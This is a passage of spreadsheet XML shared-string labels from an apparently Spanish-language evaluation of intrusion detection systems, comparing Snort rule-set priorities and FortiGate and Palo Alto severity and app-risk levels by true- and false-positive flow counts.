      <t xml:space="preserve"> (e.g. N=1 es máximo para Snort y mínimo para FG/PA)</t>
    </r>
  </si>
  <si>
    <t>N
(Nivel de Riesgo)</t>
  </si>
  <si>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&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <t>#Flows_TN</t>
  </si>
  <si>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 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</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</si>
  <si>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&gt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (Any)]</t>
    </r>
  </si>
  <si>
    <t>#Flows_FP</t>
  </si>
  <si>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&lt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>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&lt;=2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>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&lt;=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">[IPS severity </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&gt;=5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <t>NOTA: Este "pruning" empieza en el paso anterior (sin SIDs FP no en TP), pues ya sabemos que quitando esos bajan los FP, mejorando la GM.</t>
  </si>
  <si>
    <t>Mejora del Rendimiento (Pruning)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">[Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">[Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS7</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS7</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 2]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS7</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 3]</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS1 </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS7</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [Priority = 4]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPS</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>info</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>low</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>medium</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>high</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [IPS severity="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>critical</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>APP</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>information</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>low</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>medium</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>high</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <t>FG</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> [APP apprisk="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>elevated</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</si>
  <si>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t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IPS</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</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</si>
  <si>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[IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</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</si>
  <si>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[IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</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</si>
  <si>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[IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</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</si>
  <si>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[IPS severity_number="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</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</si>
  <si>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t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">APP </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</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</si>
  <si>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[APP risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</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</si>
  <si>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[APP risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3</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</si>
  <si>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[APP risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>"]</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PA</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>[APP risk_of_app="</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="15"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
